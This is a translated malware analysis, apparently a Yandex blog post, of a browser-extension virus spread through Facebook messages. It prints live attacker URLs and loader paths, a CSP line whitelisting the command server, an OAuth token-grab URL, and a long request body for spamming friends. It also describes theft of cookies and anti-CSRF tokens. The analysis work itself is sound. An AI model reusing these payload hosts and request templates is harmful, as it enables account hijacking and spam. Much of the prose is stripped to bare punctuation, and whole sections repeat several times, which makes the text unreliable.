Yandex investigation: full disclosure about the virus on Facebook
In the middle of December, in the Russian segment of Facebook, it was possible to observe a massive infection of users with a virus, which was spread through spam mailings of personal messages and publications with links to allegedly private video.
According to media reports , Facebook coped with the threat and blocked the spread of malicious messages. However, we later discovered the further spread of a number of malicious links and decided to understand how this attack works in order to protect Yandex.Browser users from it.
The media reported that the culprit was the malicious YouTurn extension for the Chrome browser, which the user was asked to install if he followed the link received from his infected friend. But we found out that several extensions were used within this infection. YouTurn, by the way, December 16 has already been removed from ChromeStore.
')
They were all the same, but they were distributed under different names and at different times through phishing resources similar to the Facebook page and hosted on Amazon S3. Interestingly, in addition to the distribution mechanisms, they loaded advertising banners with dubious content into all browser tabs and provided access to the account of an infected user to an internal application with some ID, which Facebook also blocked.
So, was this “virus” so harmless, and what was new about it?
In all cases, the malicious link was generated using various abbreviation services. When switching to it, the user was sent along a chain of server redirects, for example:
The end point was a webpage at dropboxusercontent.com. It contained very simple js scripts, the main function of which was to check the browser object “navigator” and execute the redirect depending on its value. Mobile users and IE users were redirected to the teladea.blogspot.com web page, which contained a video with a parody of the film “Friday, the 13th,” and a link to the Red Cross website .
Firefox users redirect scripts by reference
Landing-page code
Web page for Firefox users (
When you clicked on the "update Player" button, the browser extension “PremiumCodec” was installed in the Firefox browser, which was downloaded via the link
Directly installing the extension was carried out when executing the code:
Obfuscated js-script, which was located directly on the page, was responsible for this functionality.
Fragment of deobfuscated extension installation code in FireFox
Expansion analysis is presented below in the relevant section of the post.
The webpage for Chrome users (http://video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html) was also phishing and tried to impersonate Facebook. Its contents are also generated using javascript.
The full page code can be found here .
When clicking on the area with the video, the user was informed that he did not find the player, and was asked to put a special browser extension to compensate for this annoying flaw. In our case, it was the YouTube Now extension (id akmghomonnhljmlfemmifjblglkacfhg), which was installed from the Chrome Web Store using the js mechanism chrome.webstore.install.
Fragment of deobfuscated extension installation script
App page in the Chrome Web Store
The source for the extension was the same website address on Amazon S3 from which it was distributed.
The extension consisted of a number of files, it was built on the basis of the Crossbrowser.com platform, but had very simple functionality. It inserted a script into all open browser tabs.
According to media reports , Facebook coped with the threat and blocked the spread of malicious messages. However, we later discovered the further spread of a number of malicious links and decided to understand how this attack works in order to protect Yandex.Browser users from it.
The media reported that the culprit was the malicious YouTurn extension for the Chrome browser, which the user was asked to install if he followed the link received from his infected friend. But we found out that several extensions were used within this infection. YouTurn, by the way, December 16 has already been removed from ChromeStore.
')
They were all the same, but they were distributed under different names and at different times through phishing resources similar to the Facebook page and hosted on Amazon S3. Interestingly, in addition to the distribution mechanisms, they loaded advertising banners with dubious content into all browser tabs and provided access to the account of an infected user to an internal application with some ID, which Facebook also blocked.
So, was this “virus” so harmless, and what was new about it?
Analysis of the spread of malware
In all cases, the malicious link was generated using various abbreviation services. When switching to it, the user was sent along a chain of server redirects, for example:
goo.gl/rlzp52 -> dl.dropbox.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741?MYBn8KdpVhlnHNc0drEE -> dl.dropboxusercontent.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741%3FMYBn8KdpVhlnHNc0drEE= goo.gl/rlzp52 -> dl.dropbox.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741?MYBn8KdpVhlnHNc0drEE -> dl.dropboxusercontent.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741%3FMYBn8KdpVhlnHNc0drEE= ,The end point was a webpage at dropboxusercontent.com. It contained very simple js scripts, the main function of which was to check the browser object “navigator” and execute the redirect depending on its value. Mobile users and IE users were redirected to the teladea.blogspot.com web page, which contained a video with a parody of the film “Friday, the 13th,” and a link to the Red Cross website .
Firefox users redirect scripts by reference
video51828.s3-website-us-west-2.amazonaws.com/mf39.html video51828.s3-website-us-west-2.amazonaws.com/mf39.html , and those following a link in Chrome were taken to video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html , so the user with the substring “Facebook-bot” in the navigator was redirected to Google.Landing-page code
Web page for Firefox users (
video51828.s3-website-us-west-2.amazonaws.com/mf49.html video51828.s3-website-us-west-2.amazonaws.com/mf49.html ) was disguised as YouTube (web content was generated mainly via js). If a user came to this page from a mobile device based on the Android platform, a redirect was made to the s.html web page, which at the time of the analysis was no longer available. If the browser was a desktop, the page instead of the video showed a message that you need to update FlashPlayer to view. The full code can be seen here .When you clicked on the "update Player" button, the browser extension “PremiumCodec” was installed in the Firefox browser, which was downloaded via the link
premiumd1.mzzhost.com/premiumD.xpi premiumd1.mzzhost.com/premiumD.xpi . Interestingly, Firefox requires an additional permission to install the extension, but the attackers took this moment into account and, using the js-code, after pressing the update to the player, they formed an additional image showing the pointer with which to click to allow the installation.Directly installing the extension was carried out when executing the code:
top["location"] = premiumd1.mzzhost.com/premiumD.xpi.
Obfuscated js-script, which was located directly on the page, was responsible for this functionality.
Fragment of deobfuscated extension installation code in FireFox
Expansion analysis is presented below in the relevant section of the post.
The webpage for Chrome users (http://video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html) was also phishing and tried to impersonate Facebook. Its contents are also generated using javascript.
The full page code can be found here .
When clicking on the area with the video, the user was informed that he did not find the player, and was asked to put a special browser extension to compensate for this annoying flaw. In our case, it was the YouTube Now extension (id akmghomonnhljmlfemmifjblglkacfhg), which was installed from the Chrome Web Store using the js mechanism chrome.webstore.install.
Fragment of deobfuscated extension installation script
App page in the Chrome Web Store
The source for the extension was the same website address on Amazon S3 from which it was distributed.
Firefox extension analysis
The extension consisted of a number of files, it was built on the basis of the Crossbrowser.com platform, but had very simple functionality. It inserted a script into all open browser tabs.
adeaditi.info/kmain.js adeaditi.info/kmain.js by adding a new tag head . kmain.js - , . Facebook , , adeaditi.info/kmain.js - . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'" ,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js? , chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce . , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php — php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url . localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >" .
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver() ajax-, html, , action . duzenlevegonder() , , , duzenlevegonder() .
Facebook , , . . .
, facebook.com, , babasker() , bmw5done.info/ag.php . php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek() , C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj() , :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533 .
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker() .
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .head . kmain.js - , . Facebook , , adeaditi.info/kmain.js - . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'" ,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js? , chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce . , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php — php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url . localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >" .
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver() ajax-, html, , action . duzenlevegonder() , , , duzenlevegonder() .
Facebook , , . . .
, facebook.com, , babasker() , bmw5done.info/ag.php . php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek() , C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj() , :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533 .
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker() .
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js - . , Firefox Facebook- .PremiumCodec
adeaditi.info/kmain.jsChrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'" ,, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax-
bmw5done.info/qbrweq.js? , chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . ,
uiToggle wrap, uiPopover. _5ce . , . , , Facebook .qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL
bmw5done.info/apostime.php — php- C&C . , , json, : link type. :{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.link, «?», 20 , ajax-
www.googleapis.com/urlshortener/v1/url . localStorage “fb_postlink”. .ajax-api graph.facebook.com .
facebook.com/ajax/typeahead/place_tag_friends.php json . json , friends_fields, 20 :“&composertags_with[19]=<id_ >" .20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthdayuygulamaizinver() ajax-, html, , action . duzenlevegonder() , , , duzenlevegonder() .Facebook , , . . .
, facebook.com, ,
babasker() , bmw5done.info/ag.php . php-, C&C, , API Facebook. json :{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , .
qwecek() , C&C json.AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json
benimesaj() , :message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533 .API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4,
babasker() ., Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js - . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'" ,
, CSP https bmw5done.info.
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js? , chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce . , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php — php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url . localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >" .
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver() ajax-, html, , action . duzenlevegonder() , , , duzenlevegonder() .
Facebook , , . . .
, facebook.com, , babasker() , bmw5done.info/ag.php . php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek() , C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj() , :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533 .
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker() .
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .head . kmain.js - , . Facebook , , adeaditi.info/kmain.js - . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'" ,
, CSP https bmw5done.info.
main.js
main.js
